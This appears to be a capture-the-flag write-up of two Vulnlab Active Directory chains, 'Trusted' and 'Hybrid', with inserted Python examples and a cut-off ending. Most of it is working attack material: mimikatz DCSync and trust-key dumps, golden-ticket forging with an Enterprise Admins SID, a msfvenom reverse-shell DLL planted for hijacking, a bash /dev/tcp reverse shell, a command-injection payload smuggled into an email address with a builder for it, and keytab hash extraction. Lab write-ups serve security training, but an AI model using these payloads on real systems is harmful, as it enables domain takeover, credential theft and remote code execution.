*Evil-WinRM* PS C:\temp> Get-DomainTrust


SourceName      : lab.trusted.vl
TargetName      : trusted.vl
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection  : Bidirectional
WhenCreated     : 9/14/2022 6:42:24 PM
WhenChanged     : 6/26/2024 6:21:06 AM



Trust Abuse

Using the article, we can abuse the child->parent domain trust relationship and escalate to the enterprise domain.

We need the krbtgt hash of lab.trusted.vl and the SIDs of both domains; then, with mimikatz, we forge a golden ticket for the enterprise domain admin:

lsadump::dcsync /domain:lab.trusted.vl /all

Get the domain SIDs of lab.trusted.vl and trusted.vl by running:

*Evil-WinRM* PS C:\temp> ./mimi.exe  "lsadump::trust /patch" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::trust /patch

Current domain: LAB.TRUSTED.VL (LAB / S-1-5-21-2241985869-2159962460-1278545866)

Domain: TRUSTED.VL (TRUSTED / S-1-5-21-3576695518-347000760-3731839591)
 [  In ] LAB.TRUSTED.VL -> TRUSTED.VL
    * 6/26/2024 9:25:12 AM - CLEAR   - bd e0 30 b1 e3 5a 6f 28 d7 db 2d 12 f0 19 86 28 ee be df fa 8f 77 b0 7c 8a 82 05 e0 3f c0 85 81 2d 3a 45 eb 64 22 c6 e5 a3 e0 04 3f f8 fd 6d 59 d5 67 36 5d 32 f5 f2 01 3d 4a e9 29 91 c7 30 fa a4 a5 52 22 e6 17 09 c7 86 36 d7 ae 92 38 d2 7f 7a ec 7c 92 97 b6 e7 8f d3 59 74 97 31 70 8a 7d 88 11 29 e4 5c 0e ab b8 41 2a 35 39 68 f4 af 7b 01 bb 5c 6b a6 1d a6 2a d9 dc da 70 62 7e 75 c2 c4 95 9c 61 7c 98 b7 39 76 64 d6 d4 a3 9f fb f0 3c d7 76 d5 26 95 1b 96 e8 3f c2 a7 f2 99 9e 0a e9 b4 30 bf a9 6b 3a e1 ed 1e 33 17 70 43 41 d2 14 11 39 c8 d2 d5 41 54 24 f9 85 db 69 22 70 85 62 47 06 e3 2c 0a e1 bb 6e 8a 41 e8 09 1e e8 27 59 9e e7 14 d3 aa 3f 05 c3 6e 89 12 e7 cc 11 af 1a d9 a5 36 f8 2f e5 bb d5 d9 17 29 7d 11 d5 d5
    * aes256_hmac       87a58ba0eaa56e07d5eaadca5d5d043c64ef85efe9420279a98919d6d7b919f8
    * aes128_hmac       afe52545c051a7f537ea55d5abc96d31
    * rc4_hmac_nt       f3a4b4a5c1302b7da515ce596ad3281d

 [ Out ] TRUSTED.VL -> LAB.TRUSTED.VL
    * 6/26/2024 9:25:10 AM - CLEAR   - 31 dd 12 7a 9e f6 47 94 cd 56 25 1b 58 e6 e3 53 f6 77 19 eb ac bf 4f 28 1a 2d 1e 60 3b 16 6a 94 f7 25 a3 2e 40 13 fb 3d bf a4 42 a2 b1 42 bd 64 89 d6 8a 72 91 a7 da 2d ba 83 1e 6c 25 af ef ec 8c 98 3a 67 ad 67 a1 d8 d9 55 f4 dd 23 bc 93 01 16 10 7e ef 64 84 a3 be 02 25 c8 a6 45 93 b4 e8 5c 27 ee 44 06 a7 81 a0 c2 8e 3c 99 32 2b 4e 5a 19 58 55 8c bb b3 c3 24 55 9f 49 da ba 08 65 1c 3d 3c 59 36 cf 0c fe 15 3c 56 60 c8 1b e1 dd 33 54 c4 dd e3 2a a5 20 bf 9d fe dc ff 9e 61 7b 15 08 d3 22 6b a1 71 2d 48 5e 40 3f 66 fb d2 c6 cc 0c d5 af f1 0d 65 3d 72 45 2a c2 2e d7 86 e3 e0 4f 59 c2 61 fc d2 de d1 87 66 4f f8 f6 ee a4 ed e5 3e df bc b5 86 3a 13 ba ee 39 cb 28 84 58 7d 8d 65 43 28 9b f2 b4 d0 69 99 d2 c1 37 d5 d6 45
    * aes256_hmac       3e09cb23acb863c8d23bf8d07eace010cb980d5cfbda991345e4a7cec5352ad7
    * aes128_hmac       01b6b1243a4a9b0ed26869f79ef1ae75
    * rc4_hmac_nt       4eba988516b0b0fcf99c8f1b10e552de

 [ In-1] LAB.TRUSTED.VL -> TRUSTED.VL
    * 5/27/2023 4:19:25 PM - CLEAR   - ea 31 66 22 35 93 0e ef 05 dd e5 94 f0 70 b5 dd 2c de b4 ec 7a 47 73 ae 20 45 15 00 9c 0c 1a 7e 9a f4 68 c7 22 c9 d2 35 cb 67 bb 8d 56 7e 5b 9f 4e 9c b4 4c 77 a6 b7 41 2e d9 3d e4 87 73 5b ee 44 8b 4f 3f f3 e8 ac 32 21 08 db 79 9a 55 2b a0 6f c2 dd 69 c6 9a b7 4d e1 8a 4c f6 e8 0b 47 a9 cb cf 4d 6f 14 8c 28 44 66 63 85 20 13 3b c8 93 bd 20 38 ff 6c 73 d3 2a 61 a3 10 fc 2f d5 af 29 a8 5b 28 09 0d 1f 17 46 8d 7d 09 fa e8 55 61 2e d7 6b 3a 70 38 11 e0 42 08 4b 5b 2b be 53 2c 62 97 64 42 4e 11 fb 50 ed 2f ef 58 38 be 20 a4 4b f6 cf a7 45 18 73 56 be cd 6c 0a 78 16 f7 51 ae 82 59 95 7a 33 f0 27 a6 6d 08 62 ca 74 5f 82 13 c2 d2 aa 7b 12 96 b8 16 27 2e ee 48 bd e4 21 41 db a2 e2 92 ca f3 5d d6 76 cc b5 66 28 2a 87 92
    * aes256_hmac       a7880265164670ddfc041c250bdf7d8166bf8ca0c06d86c3ddec12620fdfb800
    * aes128_hmac       9d59311c51bd3eb6cc846cf1af53c80f
    * rc4_hmac_nt       fdb9239325aed982da5f521116ffbcaf

 [Out-1] TRUSTED.VL -> LAB.TRUSTED.VL
    * 6/26/2024 9:25:10 AM - CLEAR   - 7a 6f b9 f0 49 87 53 be 90 63 63 9c d9 8e 15 f5 ce b5 60 98 6d e6 08 0f 7b ab 3a 7b e3 59 48 a4 f4 6e 6f 1a cc 87 f2 19 81 9a 3b e5 f6 b0 59 28 ad 97 e2 fd fb 39 f8 15 98 ca 4e a9 c4 04 60 15 6a ca 97 0e 20 81 77 42 ac c0 c9 0d 4f 49 4d 64 ee 2a 0f ed aa 4c f3 5b fb 51 ef 50 1a 84 5d 15 a8 9c ce a5 37 a7 02 47 ff 67 0d 1a 59 1c f6 c9 11 9f a2 55 7f c0 45 db 29 77 db 54 9e 46 23 ea 60 a3 9d 9c 11 61 44 51 d2 3f 32 cc e3 67 95 1c a5 0a 0f c6 96 3d e2 a3 53 2b 92 41 a2 a2 46 9e 27 65 c4 84 b0 6f 6e 4e 95 70 0e ed a6 a9 8e 1b ac 66 e8 40 61 9f 6e 70 44 6e b1 fc dd a7 72 9d 3e bd ac b7 0e b9 6b 3c a6 b5 a0 d2 9b 74 91 39 02 f8 7c 31 16 09 7c 52 f3 e9 00 3e 0c 88 46 a3 05 c6 5c 2b f9 3c 0c 21 bd b2 04 8b bc 8a b0 74
    * aes256_hmac       bfc64ba951d28743ef247deb0fa7d69197b9fda301c64ae0765ba9c5c6418183
    * aes128_hmac       0fe86c75c4b6686fcae0bd01d0a1fa2c
    * rc4_hmac_nt       cddbd971c2e3e4ef64b4eb024e4e75c0


mimikatz(commandline) # exit
Bye!

Next, forge a ticket for the enterprise domain admin:

kerberos::golden /user:Administrator /krbtgt:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ptt
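The /sids: value in the command above is the SID history trick: the PAC of a ticket issued by the child domain carries an extra SID from the parent domain (RID 519, Enterprise Admins), and the parent's DC honours it because SID filtering is not applied on parent/child trusts inside a forest by default. The following is an added example, not part of the write-up or of mimikatz: it shows what SID filtering (a quarantined trust) does with such a PAC and what a detection rule over the same SIDs looks like, using the two domain SIDs printed by lsadump::trust above. The function names and the quarantined flag are this example's own.

```python
import re

DOMAIN_SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")

# Well-known RIDs whose appearance in SID history from another domain is the
# escalation pattern used by the golden ticket above.
PRIVILEGED_RIDS = {512: "Domain Admins", 516: "Domain Controllers",
                   518: "Schema Admins", 519: "Enterprise Admins"}

# Domain SIDs as printed by lsadump::trust on this page.
LAB_SID = "S-1-5-21-2241985869-2159962460-1278545866"     # lab.trusted.vl (child)
TRUSTED_SID = "S-1-5-21-3576695518-347000760-3731839591"  # trusted.vl (forest root)


def split_sid(sid):
    """Split a domain SID into (domain part, RID)."""
    m = DOMAIN_SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain SID: {sid}")
    return m.group(1), int(m.group(2))


def filter_sids(pac_sids, trusted_domain_sid, quarantined):
    """SID filtering as the receiving DC applies it to a ticket arriving over a trust.
    quarantined=True: only SIDs that belong to the trusted domain survive.
    quarantined=False: the default for parent/child trusts inside a forest; nothing is dropped,
    so a SID history entry pointing into the parent domain is accepted as-is."""
    kept, dropped = [], []
    for sid in pac_sids:
        domain, _ = split_sid(sid)
        if quarantined and domain != trusted_domain_sid:
            dropped.append(sid)
        else:
            kept.append(sid)
    return kept, dropped


def suspicious_sid_history(user_sid, extra_sids):
    """Detection view: extra SIDs from a domain other than the user's own that carry a
    privileged RID. A child-domain account never legitimately needs Enterprise Admins
    of the forest root in its SID history."""
    user_domain, _ = split_sid(user_sid)
    alerts = []
    for sid in extra_sids:
        domain, rid = split_sid(sid)
        if domain != user_domain and rid in PRIVILEGED_RIDS:
            alerts.append(f"{sid}: {PRIVILEGED_RIDS[rid]} of foreign domain {domain}")
    return alerts


if __name__ == "__main__":
    # The ticket above: Administrator of the child domain with the parent's RID 519 in SID history
    user = LAB_SID + "-500"
    extra = [TRUSTED_SID + "-519"]
    print("no filtering :", filter_sids(extra, LAB_SID, quarantined=False))
    print("quarantined  :", filter_sids(extra, LAB_SID, quarantined=True))
    print("alerts       :", suspicious_sid_history(user, extra))
```

The design point is that the forest, not the domain, is the security boundary: any domain admin of a child domain can reach the forest root this way, which is why SID filtering is a property of trusts between forests and why the detection has to look at the PAC contents rather than at who authenticated.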

All that is left is to dump NTDS from the trusted.vl domain:

lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /all

We find:

Credentials:

Object RDN           : Domain Controllers

** SAM ACCOUNT **

SAM Username         : Domain Controllers
Object Security ID   : S-1-5-21-3576695518-347000760-3731839591-516
Object Relative ID   : 516

Credentials:

Object RDN           : DomainDnsZones


Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Object Security ID   : S-1-5-21-3576695518-347000760-3731839591-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 15db<REDACTED>72ef

Object RDN           : BCKUPKEY_0c265ae3-ef84-4900-9983-b1fbe71e738c Secret

And we evil-winrm to the main DC:

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ evil-winrm -u Administrator -H '15db<REDACTED>72ef' -i trusted.vl
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
trusted\administrator


Recommended path

Use dnschef with bloodhound-python:

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ dnschef --fakeip 10.10.158.230
          _                _          __  
         | | version 0.4  | |        / _| 
       __| |_ __  ___  ___| |__   ___| |_ 
      / _` | '_ \/ __|/ __| '_ \ / _ \  _|
     | (_| | | | \__ \ (__| | | |  __/ |  
      \__,_|_| |_|___/\___|_| |_|\___|_|  
                   iphelix@thesprawl.org  

(18:52:27) [*] DNSChef started on interface: 127.0.0.1
(18:52:27) [*] Using the following nameservers: 8.8.8.8
(18:52:27) [*] Cooking all A replies to point to 10.10.158.230
(18:52:53) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.pdc._msdcs.LAB.TRUSTED.VL
(18:52:53) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.pdc._msdcs.LAB.TRUSTED.VL.home
(18:52:54) [*] 127.0.0.1: cooking the response of type 'A' for labdc.LAB.TRUSTED.VL to 10.10.158.230
(18:52:55) [*] 127.0.0.1: cooking the response of type 'A' for labdc.LAB.TRUSTED.VL to 10.10.158.230
┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ bloodhound-python -d 'LAB.TRUSTED.VL' -u 'rsmith' -p 'IHateEric2' -ns 127.0.0.1 -dc labdc.LAB.TRUSTED.VL -c all --zip
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
INFO: Getting TGT for user
INFO: Connecting to LDAP server: labdc.LAB.TRUSTED.VL
INFO: Found 1 domains
INFO: Found 2 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: labdc.LAB.TRUSTED.VL
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
INFO: Found 7 users
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
INFO: Found 47 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
INFO: Found 1 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: labdc.lab.trusted.vl
INFO: Done in 00M 05S
INFO: Compressing output into 20240624185341_bloodhound.zip

BloodHound analysis shows that rsmith has ForceChangePassword over ewalters, so rsmith can reset that account's password without knowing the old one:

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ rpcclient -U "rsmith" //10.10.192.230

Password for [WORKGROUP\rsmith]:IHateEric2
rpcclient $> setuserinfo2 ewalters 23 'Passw0rd123!'
rpcclient $> 

We can verify that the password was actually changed and that ewalters can log in through WinRM:

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ crackmapexec winrm 10.10.192.230 -u ewalters -p 'Passw0rd123!' 
SMB         10.10.192.230   5985   LABDC            [*] Windows Server 2022 Build 20348 (name:LABDC) (domain:lab.trusted.vl)
HTTP        10.10.192.230   5985   LABDC            [*] http://10.10.192.230:5985/wsman
WINRM       10.10.192.230   5985   LABDC            [+] lab.trusted.vl\ewalters:Passw0rd123! (Pwn3d!)

and evil-winrm in labdc

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ evil-winrm -u ewalters -p Passw0rd123! -i 10.10.192.230 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ewalters\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\ewalters\Documents> hostname
labdc
*Evil-WinRM* PS C:\Users\ewalters\Documents> 

.

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ impacket-smbserver -smb2support share .   
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.192.230,59756)
[*] AUTHENTICATE_MESSAGE (\,LABDC)
[*] User LABDC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:share)
[*] Disconnecting Share(1:IPC$)
[*] Connecting Share(3:IPC$)
[*] Disconnecting Share(3:IPC$)
*Evil-WinRM* PS C:\AVTest> dir


    Directory: C:\AVTest


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         9/14/2022   4:46 PM        4870584 KasperskyRemovalTool.exe
-a----         9/14/2022   7:05 PM            235 readme.txt


*Evil-WinRM* PS C:\AVTest> net use \\10.8.2.138\share
The command completed successfully.

*Evil-WinRM* PS C:\AVTest> copy .\KasperskyRemovalTool.exe \\10.8.2.138\share\KasperskyRemovalTool.exe
*Evil-WinRM* PS C:\AVTest> 

After examining KasperskyRemovalTool.exe with Procmon on my Windows box: it tries to load KasperskyRemovalToolENU.dll from its own directory, where no such file exists. Since C:\AVTest is writable, a DLL with that name placed next to the binary gets loaded instead (DLL search-order hijacking). Generate one with msfvenom:

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.8.2.138 LPORT=2222 -f dll > KasperskyRemovalToolENU.dll 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 9216 bytes
*Evil-WinRM* PS C:\AVTest> curl http://10.8.2.138/KasperskyRemovalToolENU.dll -o KasperskyRemovalToolENU.dll 
*Evil-WinRM* PS C:\AVTest> dir


    Directory: C:\AVTest


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         9/14/2022   4:46 PM        4870584 KasperskyRemovalTool.exe
-a----         6/27/2024   8:19 AM           9216 KasperskyRemovalToolENU.dll
-a----         9/14/2022   7:05 PM            235 readme.txt


*Evil-WinRM* PS C:\AVTest> 

After a couple of seconds (once the scheduled task restarts the binary) we receive a shell as cpowers (a domain admin):

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ nc -nlvp 2222 
listening on [any] 2222 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.192.230] 51759
Microsoft Windows [Version 10.0.20348.887]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
lab\cpowers

C:\Windows\system32>

The scheduled task below runs as cpowers every minute: it kills any running KasperskyRemovalTool and starts it again from C:\AVTest, which is why the planted DLL gets loaded in cpowers' context:

C:\Users\cpowers\Documents>type task.ps1
type task.ps1
Get-Process "KasperskyRemovalTool" | Stop-Process -Force
Start-Process -FilePath "C:\AVTest\KasperskyRemovalTool.exe"
C:\Users\cpowers\Documents>

That’s all

vulnlab-hybrid

vulnhub-hybrid

a medium Active Directory chain

containing: one AD-joined Ubuntu host (MAIL01) and a Windows DC (DC01)

Tools used : keytabextract.py

NMAP enum

# Nmap 7.93 scan initiated Thu Jun 20 10:25:26 2024 as: nmap -Pn -sV -oN ports_hybrid1.txt 10.10.200.5
Nmap scan report for 10.10.200.5
Host is up (0.021s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-20 08:25:36Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 20 10:26:16 2024 -- 1 IP address (1 host up) scanned in 49.67 seconds

.

# Nmap 7.93 scan initiated Thu Jun 20 10:27:06 2024 as: nmap -Pn -sV -oN ports_hybrid2.txt 10.10.200.6
Nmap scan report for 10.10.200.6
Host is up (0.020s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
25/tcp   open  smtp     Postfix smtpd
80/tcp   open  http     nginx 1.18.0 (Ubuntu)
110/tcp  open  pop3     Dovecot pop3d
111/tcp  open  rpcbind  2-4 (RPC #100000)
143/tcp  open  imap     Dovecot imapd (Ubuntu)
587/tcp  open  smtp     Postfix smtpd
993/tcp  open  ssl/imap Dovecot imapd (Ubuntu)
995/tcp  open  ssl/pop3 Dovecot pop3d
2049/tcp open  nfs_acl  3 (RPC #100227)
Service Info: Host:  mail01.hybrid.vl; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 20 10:27:19 2024 -- 1 IP address (1 host up) scanned in 13.26 seconds

.

Through NFS enumeration (MAIL01 exports a share on 2049/tcp) we find these credentials:

admin@hybrid.vl:Duckling21
peter.turner@hybrid.vl:PeterIstToll!

For the mail part in Roundcube I used a reverse shell, base64-encoded so it contains no quotes, spaces or slashes, and injected through the recipient address with ${IFS} standing in for the spaces:

bash -i >& /dev/tcp/10.8.2.138/2222 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjIuMTM4LzIyMjIgMD4mMQ==

admin&echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjIuMTM4LzIyMjIgMD4mMQ==${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash&@hybrid.vl
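As an added example (my code, not from the original write-up), here is how the injected address above is built and how an application should have rejected it. It assumes the recipient address ends up on a shell command line unquoted, which is what makes `&` and `${IFS}` work; the command, callback IP and port are the ones from the write-up, and the allow-list regex is my own choice.

```python
import base64
import re

# The reverse-shell one-liner from the write-up (callback to the attacker's VPN IP).
REVERSE_SHELL = "bash -i >& /dev/tcp/10.8.2.138/2222 0>&1"


def build_injected_address(command: str, local_part: str = "admin",
                           domain: str = "hybrid.vl") -> str:
    """Smuggle a shell command inside an e-mail address.

    base64 strips spaces, quotes and slashes out of the command itself; the
    decode-and-run stager then uses ${IFS} (bash's field separator, a space by
    default) instead of literal spaces so the address survives a naive
    "no whitespace" check.  '&' terminates whatever command the address was
    spliced into and backgrounds it, so the stager runs regardless.
    """
    encoded = base64.b64encode(command.encode()).decode()
    stager = f"echo {encoded} | base64 -d | bash".replace(" ", "${IFS}")
    return f"{local_part}&{stager}&@{domain}"


# Characters that let an attacker break out once the address reaches a shell.
SHELL_META = re.compile(r"[;&|`$<>\\(){}\s]")
# Conservative allow-list for what the application should accept as a recipient
# (my choice for this example; tighter than RFC 5322 on purpose).
ADDRESS_RE = re.compile(r"[A-Za-z0-9._+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")


def is_safe_recipient(address: str) -> bool:
    """Allow-list check to run before an address is ever handed to sendmail or a shell."""
    return ADDRESS_RE.fullmatch(address) is not None and not SHELL_META.search(address)


def recover_command(address: str) -> str:
    """Pull the base64 payload back out of an injected address (analyst side)."""
    m = re.search(r"echo\$\{IFS\}([A-Za-z0-9+/=]+)\$\{IFS\}", address)
    if m is None:
        raise ValueError("no ${IFS}-separated base64 stager found")
    return base64.b64decode(m.group(1)).decode()


if __name__ == "__main__":
    payload = build_injected_address(REVERSE_SHELL)
    print(payload)
    print("blocked by validator:", not is_safe_recipient(payload))
    print("decoded:", recover_command(payload))
```

The allow-list approach matters more than the blocklist: `SHELL_META` documents what the payload needed, but `ADDRESS_RE.fullmatch` is what actually stops variants that use other metacharacters.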

BloodHound Enum

┌──(puck㉿kali)-[~/vulnlab/hybrid]
bloodhound-python -d 'hybrid.vl' -u 'peter.turner' -p 'b0cwR+G4Dzl_rw' -gc 'dc01.hybrid.vl' -ns 10.10.200.5 --zip

Certipy: find vulnerable certificate templates

┌──(puck㉿kali)-[~/vulnlab/hybrid]
certipy-ad find -u peter.turner@hybrid.vl -p 'b0cwR+G4Dzl_rw' -vulnerable -stdout -dc-ip 10.10.200.5      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'hybrid-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'hybrid-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : hybrid-DC01-CA
    DNS Name                            : dc01.hybrid.vl
    Certificate Subject                 : CN=hybrid-DC01-CA, DC=hybrid, DC=vl
    Certificate Serial Number           : 6FC0F9512195A183421AB786C3012BC6
    Certificate Validity Start          : 2023-06-17 14:04:39+00:00
    Certificate Validity End            : 2123-06-17 14:14:39+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : HYBRID.VL\Administrators
      Access Rights
        ManageCertificates              : HYBRID.VL\Administrators
                                          HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
        ManageCa                        : HYBRID.VL\Administrators
                                          HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
        Enroll                          : HYBRID.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : HybridComputers
    Display Name                        : HybridComputers
    Certificate Authorities             : hybrid-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 100 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Domain Computers
                                          HYBRID.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : HYBRID.VL\Administrator
        Write Owner Principals          : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
                                          HYBRID.VL\Administrator
        Write Dacl Principals           : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
                                          HYBRID.VL\Administrator
        Write Property Principals       : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
                                          HYBRID.VL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'HYBRID.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

Certipy reports ESC1 on the HybridComputers template: any member of Domain Computers can enroll, the enrollee supplies the subject, and the certificate is valid for client authentication. We already have a shell on the domain-joined MAIL01$ machine, and enumerating it further turned up /etc/krb5.keytab, the file that lets the host authenticate to Kerberos without a human typing a password (it holds the machine account's long-term keys).

I transferred krb5.keytab to my Kali machine and used keytabextract.py to pull out the MAIL01$ keys, including the NT hash:

python3 keytabextract.py krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
        REALM : HYBRID.VL
        SERVICE PRINCIPAL : MAIL01$/
        NTLM HASH : 0f916c5246fdbc7ba95dcef4126d57bd
        AES-256 HASH : eac6b4f4639b96af4f6fc2368570cde71e9841f2b3e3402350d3b6272e436d6e
        AES-128 HASH : 3a732454c95bcef529167b6bea476458
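The keytab format that keytabextract.py reads is simple enough to parse by hand. The following is an added example (my code, not keytabextract.py and not anything from the box): an MIT keytab parser that lists every principal, enctype and key, and shows why the rc4-hmac entry is directly usable as an NT hash. The embedded keytab is constructed with made-up keys; it is not the real /etc/krb5.keytab from MAIL01.

```python
import struct
from dataclasses import dataclass
from typing import List, Optional

# Kerberos enctype numbers (RFC 3962 for AES, RFC 4757 for RC4-HMAC).
ENCTYPES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96", 23: "rc4-hmac"}


@dataclass
class KeytabEntry:
    principal: str   # "comp1/comp2@REALM"
    name_type: int
    timestamp: int
    kvno: int
    enctype: int
    key: bytes


def _counted_octets(buf: bytes, off: int):
    """uint16 length followed by that many bytes (MIT 'counted_octet_string')."""
    (n,) = struct.unpack_from(">H", buf, off)
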